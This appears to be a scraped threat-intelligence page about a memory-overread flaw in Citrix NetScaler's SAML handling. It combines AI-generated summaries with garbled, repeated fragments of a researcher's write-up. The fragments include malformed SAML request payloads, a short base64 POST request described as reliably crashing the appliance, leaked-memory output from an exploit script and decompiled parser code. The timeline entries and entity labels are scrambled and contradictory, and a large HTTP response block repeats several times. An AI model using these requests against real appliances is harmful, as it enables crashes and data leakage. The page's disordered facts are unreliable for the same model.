INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).
Citrix Patches NetScaler Vulnerability with CitrixBleed Flaw
| 2026-06-30 19:35 CRITICAL HIGH VULNERABILITY DISCLOSURE
Executive Summary
AI-generated
The recent discovery of CVE-2026-8451, a memory overread vulnerability in the Netscaler product line, has sparked widespread concern among threat actors and organizations. This critical flaw allows remote attackers to send requests to IDP appliances, triggering a memory disclosure attack that can leak sensitive data. Researchers at WatchTowr have identified the vulnerability and reported it to Citrix, which is urging organizations to upgrade to fixed versions of NetScaler ADC and Gateway immediately. The threat advisory from Aviatrix highlights the similarities between CVE-2026-8451 and previous attacks like CitrixBleed, emphasizing the need for swift action by affected organizations.
Technical Mitigations AI-generated
* Implement secure configuration and patching of NetScaler devices, including:
+ Ensuring that all configurations are up-to-date with the latest patches
+ Using a secure configuration management system to track changes and ensure consistency across environments
+ Regularly reviewing and updating security documentation and guides to reflect changing threat landscapes
* Monitor for suspicious activity and implement incident response plans to address potential exploitation of CVE-2026-8451:
+ Establish a dedicated team or resource to monitor NetScaler devices for signs of exploitation
+ Develop an incident response plan that includes procedures for containment, eradication, recovery, and post-incident activities
* Use secure protocols and authentication mechanisms when communicating with NetScaler devices:
+ Implement HTTPS (SSL/TLS) encryption for all communication between Citrix's systems and NetScaler devices
+ Use strong passwords and multi-factor authentication to protect access to sensitive data on NetScaler devices
* Regularly review and update security controls and configurations to ensure they remain effective against emerging threats:
+ Conduct regular vulnerability assessments and penetration testing to identify potential weaknesses in the system
+ Update security controls, such as firewalls and intrusion detection systems, with the latest threat intelligence and mitigation techniques
Technical Observables Login Required
Indicators of Compromise (IoCs) Protected
Raw threat telemetry, malicious IP addresses, file hashes, and direct VirusTotal correlation are restricted to authenticated users.
hxxp://••••••••••••••••••••
hxxp://••••••••••••••••••••
hxxp://••••••••••••••••••••
hxxp://••••••••••••••••••••
co•••••.nsgclient
ns•••••.log
al•••••.com
sp•••••.com
re•••••.js
in•••••.html
wa•••••.py
re•••••.js
192.168.•••.•••
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
CVE-2026-10817CVE-2026-10817
CVE-2026-8655CVE-2026-8655
CVE-2026-8451CVE-2026-8451
CVE-2026-13474CVE-2026-13474
CVE-2026-10816CVE-2026-10816
CVE-2026-8452CVE-2026-8452
CVE-2026-3055CVE-2026-3055
Target & Sectors
NORTH_AMERICA
NORTH_AMERICA
Incident Timeline
late 2023
Threat actors exploited a previously unknown vulnerability in Citrix's NetScaler product.
March 2026
Threat actors exploited a previously undisclosed vulnerability in Citrix's NetScaler product.
Click on any entity below to view its context and source!
target_region
United States
Yes, that’s right - today, a Secure By Design promise ring pledge commitment hall-of-famer is back to haunt us as Citrix has now publicly disclosed the zero-day Memory Disclosure vulnerability we reported in March 2026.
organisation
Secure By Design
Yes, that’s right - today, a Secure By Design promise ring pledge commitment hall-of-famer is back to haunt us as Citrix has now publicly disclosed the zero-day Memory Disclosure vulnerability we reported in March 2026.
late March 2026
Threat actors exploited a previously undisclosed vulnerability in Citrix's NetScaler product to gain unauthorized access.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-8451
watchTowr Labs, in a technical write-up released alongside Citrix's bulletin, said CVE-2026-8451 was discovered and reported in late March 2026 after attempts to reproduce
CVE-2026-3055
(CVSS score: 9.3), a separate insufficient input validation flaw that was disclosed earlier this year.
vulnerability
CVE-2026-3055
watchTowr Labs, in a technical write-up released alongside Citrix's bulletin, said CVE-2026-8451 was discovered and reported in late March 2026 after attempts to reproduce
CVE-2026-3055
(CVSS score: 9.3), a separate insufficient input validation flaw that was disclosed earlier this year.
infrastructure
9.3
watchTowr Labs, in a technical write-up released alongside Citrix's bulletin, said CVE-2026-8451 was discovered and reported in late March 2026 after attempts to reproduce
CVE-2026-3055
(CVSS score: 9.3), a separate insufficient input validation flaw that was disclosed earlier this year.
general_metric
9.3 score
watchTowr Labs, in a technical write-up released alongside Citrix's bulletin, said CVE-2026-8451 was discovered and reported in late March 2026 after attempts to reproduce
CVE-2026-3055
(CVSS score: 9.3), a separate insufficient input validation flaw that was disclosed earlier this year.
28th March 2026
Citrix responded with an automatic reply.
Click on any entity below to view its context and source!
organisation
Detail
Timeline
Date
Detail
28th March 2026
watchTowr discovers issue, notifies Citrix and affected clients
28th March 2026
Citrix responds with what appears to be an automatic reply
30th April 2026
watchTowr requests update from Citrix
7th
30th April 2026
Citrix responds with an automatic reply.
Click on any entity below to view its context and source!
organisation
Detail
Timeline
Date
Detail
28th March 2026
watchTowr discovers issue, notifies Citrix and affected clients
28th March 2026
Citrix responds with what appears to be an automatic reply
30th April 2026
watchTowr requests update from Citrix
7th
May 2026
Citrix advises watchTowr to update its platform due to a vulnerability in NetScaler.
14 June 2026
Threat actors used a vulnerability in Citrix's NetScaler to target their systems.
2026/06/29
Threat actors used Aviatrix's patch to exploit a memory-disclosure vulnerability in NetScaler SAML IDP appliances.
2026/06/30
Threat actors exploited a previously undisclosed vulnerability in Citrix's NetScaler product.
Click on any entity below to view its context and source!
target_region
United States
Yes, that’s right - today, a Secure By Design promise ring pledge commitment hall-of-famer is back to haunt us as Citrix has now publicly disclosed the zero-day Memory Disclosure vulnerability we reported in March 2026.
organisation
Secure By Design
Yes, that’s right - today, a Secure By Design promise ring pledge commitment hall-of-famer is back to haunt us as Citrix has now publicly disclosed the zero-day Memory Disclosure vulnerability we reported in March 2026.
29th June
25th June 2026
Citrix advises that a fix for the NetScaler vulnerability will be published on June 29.
30th June 2026
Citrix advises that a fix for the NetScaler vulnerability will be published on June 29.
June 30
Citrix patched the Netscaler vulnerability CVE-2026-8451 on June 30.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-8451
Citrix on June 30 took the wraps off CVE-2026-8451, the memory overread vulnerability in the company's Netscaler product line that received a CVSS score of 8.8.
vulnerability
CVSS score of 8.8
Citrix on June 30 took the wraps off CVE-2026-8451, the memory overread vulnerability in the company's Netscaler product line that received a CVSS score of 8.8.
organisation
CVSS
Citrix on June 30 took the wraps off CVE-2026-8451, the memory overread vulnerability in the company's Netscaler product line that received a CVSS score of 8.8.
30 June 2026
Threat actors exploited a previously unknown vulnerability in Citrix's NetScaler product to gain unauthorized access.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-8451
"The structure matches the CVE-2026-8451 Detection Artifact Generator published by watchTowr on 30 June 2026.
2023-4966
Threat actors exploited the Citrix NetScaler vulnerability CVE 2023-4966.
2026/06/30
The threat actors exploited the NetScaler Pre-Auth Memory Overread CVE-2026-8451 vulnerability.
Click on any entity below to view its context and source!
infrastructure
2.0
It gives us a clean baseline before we begin progressively breaking things and observing how the parser responds:
<samlp:AuthnRequest
xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
ID="_99d3e71118f42305e05acb14ad0bd917"
Version="2.0"
ProviderName="SP test"
Destination="<
ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
AssertionConsumerServiceURL="<
<saml:Issuer><
<samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress" AllowCreate="true"/>
<samlp:RequestedAuthnContext Comparison="exact">
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</samlp:RequestedAuthnContext>
</samlp:
<samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=11
id=22>
<saml:Issuer>watchtowr</saml:Issuer>
</samlp:
href="/vpn/index.html"><span id="here"></span></a><span id="Trailing phrase after here"></span></body></html>
With the log file… not being so coy:
AuthnReq start tag parsed, id=<22>, acs=<11 id=22>, forceAuth=<0>, binding=<Unknown>,
following data Version="2.0" AssertionConsumerServiceURL=11 id=22> <saml:Issuer>watchtowr</saml:Issuer> </samlp:
If we terminate both
AssertionConsumerServiceURL
and
ID
with newlines, and leave the opening
AuthnRequest
tag unclosed, we end up with the following request:
<samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=
id=
<saml:Issuer>watchtowr</saml:Issuer>
</samlp:
href="/vpn/index.html"><span id="here"></span></a><span id="Trailing phrase after here"></span></body></html>
.. but the generated log is far from boring:
AuthnReq start tag parsed, id=<<saml:Issuer>, acs=<id= <saml:Issuer>,
forceAuth=<0>, binding=<Unknown>, following data Version="2.0" AssertionConsumerServiceURL= id= <saml:Issuer>watchtowr</saml:Issuer> </samlp:
For example:
<samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=11
id=22
</samlp:
AuthnRequest>
Version="2.0"
id="11"
AssertionConsumerServiceURL="22"
This yields a successful response - although the extracted details are incorrect:
AuthnReq start tag parsed, id=<>, acs=<22>, forceAuth=<0>, binding=<Unknown>
You might note that the
acs
value returned is correct -
22
- because we’ve carefully enclosed the value in the request in quotes.
AuthnRequest>
Version="2.0"
id="11"
AssertionConsumerServiceURL=
And in our favorite log…:
AuthnReq start tag parsed, id=<>, acs=<▒^M▒ᆳ▒="2.0" id="11"
AssertionConsumerServiceURL="22"ᆳ▒mple.com/demo1/index.php</saml:Issuer>,
forceAuth=<0>, binding=<Unknown>
OH HO HO.
infrastructure
1.1
It gives us a clean baseline before we begin progressively breaking things and observing how the parser responds:
<samlp:AuthnRequest
xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
ID="_99d3e71118f42305e05acb14ad0bd917"
Version="2.0"
ProviderName="SP test"
Destination="<
ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
AssertionConsumerServiceURL="<
<saml:Issuer><
<samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress" AllowCreate="true"/>
<samlp:RequestedAuthnContext Comparison="exact">
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</samlp:RequestedAuthnContext>
</samlp:
Of course, if you're more interested in demonstrating impact than building exploit chains, there is a much easier route, as naturally in enterprise-grade security appliances, requests as simple as the following are enough to reliably crash the target system:
<samlp:AuthnRequest ID=
POST /saml/login HTTP/1.1
Host: 192.168.80.125
Content-Length: 46
SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCBJRD0%3D
This request causes the
nsppe
process to "crash out":
Detection Artefact Generator
organisation
▒
AuthnRequest>
Version="2.0"
id="11"
AssertionConsumerServiceURL=
And in our favorite log…:
AuthnReq start tag parsed, id=<>, acs=<▒^M▒ᆳ▒="2.0" id="11"
AssertionConsumerServiceURL="22"ᆳ▒mple.com/demo1/index.php</saml:Issuer>,
forceAuth=<0>, binding=<Unknown>
OH HO HO.
infrastructure
192.168.80
Of course, if you're more interested in demonstrating impact than building exploit chains, there is a much easier route, as naturally in enterprise-grade security appliances, requests as simple as the following are enough to reliably crash the target system:
<samlp:AuthnRequest ID=
POST /saml/login HTTP/1.1
Host: 192.168.80.125
Content-Length: 46
SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCBJRD0%3D
This request causes the
nsppe
process to "crash out":
Detection Artefact Generator
organisation
SAMLRequest
Of course, if you're more interested in demonstrating impact than building exploit chains, there is a much easier route, as naturally in enterprise-grade security appliances, requests as simple as the following are enough to reliably crash the target system:
<samlp:AuthnRequest ID=
POST /saml/login HTTP/1.1
Host: 192.168.80.125
Content-Length: 46
SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCBJRD0%3D
This request causes the
nsppe
process to "crash out":
Detection Artefact Generator
organisation
NetScaler Pre-Auth Memory Overread CVE-2026-8451
CitrixBleed To Infinity And Beyond (Citrix NetScaler Pre-Auth Memory Overread CVE-2026-8451).
organisation
90 de de de de de de de de de de de de de |
In practice, we found that by varying the request length, we could consistently squeeze a few bytes out of the server:
c:\>python watchTowr-vs-Netscaler-CVE-2026-8451.py <
..
Leaked bytes:
00000000 f0 0d 90 de de de de de de de de de de de de de |................
organisation
CitrixBleed
And like CitrixBleed and
its successors
, CVE-2026-8451 has also attracted the attention of threat actors.
For those that don’t start violently wretching when the phrase “Citrix NetScaler” is uttered, we have another word to whisper: “CitrixBleed”.
Citrix patches a new NetScaler flaw with echoes of CitrixBleed.
organisation
CVE-2026
Researchers at WatchTowr discovered CVE-2026-8451 in March and reported their findings to Citrix.
Doing “what we do best”, back in March we found ourselves feverishly analyzing patches and changes to reproduce CVE-2026-3055 aka CitrixBleed4(?) affecting NetScaler’s configured as an IDP provider.
organisation
WatchTowr
Researchers at WatchTowr discovered CVE-2026-8451 in March and reported their findings to Citrix.
WatchTowr researcher Aliz Hammond wrote that the firm found the flaw in late March while reproducing a separate vulnerability, CVE-2026-3055, that Citrix disclosed earlier this year.
organisation
IP
Based on activity from the company's decoy infrastructure, a single threat actor tied to a malicious IP address deployed an exploitation payload for CVE-2026-8451, Lupovis confirmed.
organisation
Corporate Risks Posed
Corporate Risks Posed by CVE-2026-8451
organisation
Aviatrix
Aviatrix researchers also noted CVE-2026-8451's similarities to the
CitrixBleed attacks,
and urged organizations to take action.
organisation
NULL
It’s never done that before (lol)
One thing we’re keen to note: in contrast to the original CVE-2026-3055, in which kilobytes of binary data can be leaked, this overread will terminate the out-of-bounds read when various control characters are read, such as NULL (or even
>
).
"One thing we're keen to note: in contrast to the original CVE-2026-3055, in which kilobytes of binary data can be leaked, this overread will terminate the out-of-bounds read when various control characters are read, such as NULL (or even >)," security researcher Hammond
said
.
infrastructure
Cursor
The result is delightful snippets like the following, taken from the code responsible for parsing XML attributes such as
foo="bar"
:
cursor = <some string input>
whitespaceCharList = 0x100002600;
//
Skip leading whitespace
for ( lookahead = (v32 + 28); ; lookahead++ )
{
ch = *cursor;
if ( ch > '=' )
break;
if ( !_
bittest64(&whitespaceCharList, ch) )
break;
++lookahead;
}
cursor = lookahead;
}
break;
}
++cursor;
}
//
== '"' )
{
terminator = ch;
first = *++cursor;
}
else
{
terminator = ' ';
first = ch;
}
if ( first == terminator )
return 0xE0002; //
scanPos = cursor;
while ( first !
if ( scanPos == cursor )
return 0xE0002; // the value is empty.
out->value_ptr = cursor;
out->value_len = scanPos - cursor;
The first thing that probably jumps out is the slightly odd-looking
_bittest64()
call.
infrastructure
28 Skip leading whitespace
Skip leading whitespace
for ( lookahead = (v32 + 28); ; lookahead++ )
{
ch = *cursor;
if ( ch > '=' )
break;
if ( !_
organisation
Content-Length
As expected, NetScaler parses each of the values correctly:
POST /saml/login HTTP/1.1
Host: all-ur-boxen.com
Content-Length: 1090
SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCAKCXhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIAoJeG1sbnM6c2FtbD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiIgCglJRD0iXzk5ZDNlNzExMThmNDIzMDVlMDVhY2IxNGFkMGJkOTE3IiAKCVZlcnNpb249IjIuMCIgCglQcm92aWRlck5hbWU9IlNQIHRlc3QiIAoJRGVzdGluYXRpb249Imh0dHA6Ly9pZHAuZXhhbXBsZS5jb20vU1NPU2VydmljZS5waHAiIAoJUHJvdG9jb2xCaW5kaW5nPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YmluZGluZ3M6SFRUUC1QT1NUIiAKCUFzc2VydGlvbkNvbnN1bWVyU2VydmljZVVSTD0iaHR0cDovL3NwLmV4YW1wbGUuY29tL2RlbW8xL2luZGV4LnBocD9hY3MiPgoJPHNhbWw6SXNzdWVyPmh0dHA6Ly9zcC5leGFtcGxlLmNvbS9kZW1vMS9tZXRhZGF0YS5waHA8L3NhbWw6SXNzdWVyPgoJPHNhbWxwOk5hbWVJRFBvbGljeSBGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjEuMTpuYW1laWQtZm9ybWF0OmVtYWlsQWRkcmVzcyIgQWxsb3dDcmVhdGU9InRydWUiLz4KCTxzYW1scDpSZXF1ZXN0ZWRBdXRobkNvbnRleHQgQ29tcGFyaXNvbj0iZXhhY3QiPgoJPHNhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2bdXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmRQcm90ZWN0ZWRUcmFuc3BvcnQ8L3NhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2bCgk8L3NhbWxwOlJlcXVlc3RlZEF1dGhuQ29udGV4dD4KPC9zYW1scDpBdXRoblJlcXVlc3Q%2b
The HTTP response is just a
302
(honestly, it’s contents are not particularly interesting, so we have omitted them):
organisation
Content-Security-Policy
HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD1fOTlkM2U3MTExOGY0MjMwNWUwNWFjYjE0YWQwYmQ5MTcmYmluZD1wb3N0JkFDU1VSTD1odHRwOi8vc3AuZXhhbXBsZS5jb20vZGVtbzEvaW5kZXgucGhwP2FjcwA=;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src < 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action 'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
<html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script type="text/javascript" src="/vpn/resources.js"></script><script type="text/javascript" src="/vpn/init/redirection_body_resources.js"></script></head><body><span id="This object may be found "></span><a
organisation
Set-Cookie
HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD1fOTlkM2U3MTExOGY0MjMwNWUwNWFjYjE0YWQwYmQ5MTcmYmluZD1wb3N0JkFDU1VSTD1odHRwOi8vc3AuZXhhbXBsZS5jb20vZGVtbzEvaW5kZXgucGhwP2FjcwA=;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src < 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action 'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
<html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script type="text/javascript" src="/vpn/resources.js"></script><script type="text/javascript" src="/vpn/init/redirection_body_resources.js"></script></head><body><span id="This object may be found "></span><a
organisation
CsrfToken
HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD1fOTlkM2U3MTExOGY0MjMwNWUwNWFjYjE0YWQwYmQ5MTcmYmluZD1wb3N0JkFDU1VSTD1odHRwOi8vc3AuZXhhbXBsZS5jb20vZGVtbzEvaW5kZXgucGhwP2FjcwA=;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src < 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action 'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
<html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script type="text/javascript" src="/vpn/resources.js"></script><script type="text/javascript" src="/vpn/init/redirection_body_resources.js"></script></head><body><span id="This object may be found "></span><a
organisation
GMT
HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD1fOTlkM2U3MTExOGY0MjMwNWUwNWFjYjE0YWQwYmQ5MTcmYmluZD1wb3N0JkFDU1VSTD1odHRwOi8vc3AuZXhhbXBsZS5jb20vZGVtbzEvaW5kZXgucGhwP2FjcwA=;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src < 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action 'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
<html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script type="text/javascript" src="/vpn/resources.js"></script><script type="text/javascript" src="/vpn/init/redirection_body_resources.js"></script></head><body><span id="This object may be found "></span><a
organisation
X-XSS-Protection
HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD1fOTlkM2U3MTExOGY0MjMwNWUwNWFjYjE0YWQwYmQ5MTcmYmluZD1wb3N0JkFDU1VSTD1odHRwOi8vc3AuZXhhbXBsZS5jb20vZGVtbzEvaW5kZXgucGhwP2FjcwA=;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src < 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action 'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
